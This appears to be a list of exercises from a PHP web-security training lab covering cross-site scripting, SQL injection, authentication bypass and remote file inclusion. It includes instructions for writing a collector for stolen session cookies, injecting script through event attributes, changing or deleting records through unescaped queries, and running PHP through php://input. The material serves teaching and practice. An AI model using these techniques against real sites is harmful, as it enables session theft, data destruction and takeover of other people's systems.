1.1 Create a script in PHP or other language which will collect stolen sessions. It can save data to the database or send them by e-mail. If you are not able to create the script, use 1-xss/exploit/add.php accepting login and cookie parameters and 1-xss/exploit/ displaying stolen sessions.
1.2 Write message with <script> tag stealing user sessions. You can use document.write('<script src="...">') and document.cookie holding all cookies valid for current page.
1.3 Script strip_tags.php allows only <strong> and <em> tags. Use the onmouseover or other attribute to steal the session. You can use document.createElement('script') and document.getElementById('login').appendChild() or AJAX. Use style attribute to spread the element to the whole window.
2.1 Change passwords of all users. Hint: login is not properly escaped.
2.2 Delete all authors in SQLite.
2.3 Cause SQL syntax error with wrong escaping mysql_real_escape_string($_GET["offset"]).
3.1 Gain access to the secret information. This is the code used in the script: if ($_POST["password"] == "...") $auth = true;.
3.2 e_notice.php script has its credentials stored in $auth["password"]. Even if it has E_NOTICE error level enabled, it can be still easily fooled if you guess just the first letter of password.
4.1 Create a text file with PHP script printing the source of index.php and put it somewhere on the web. If you don't have a capability to perform this step you can use 4-include/exploit/highlight_file.txt.
4.2 Print the source of index.php (execute the created file in the context of original page).
4.3 You can see that variable $auth is correctly initialized in index.php. However, it is still possible to display secret information on secure page running it without context of index.php and injecting variable.
4.4 Imagine that allow_url_fopen directive is disabled. You can still gain control over the site by passing php://input and posting PHP code. Create a script performing this operation.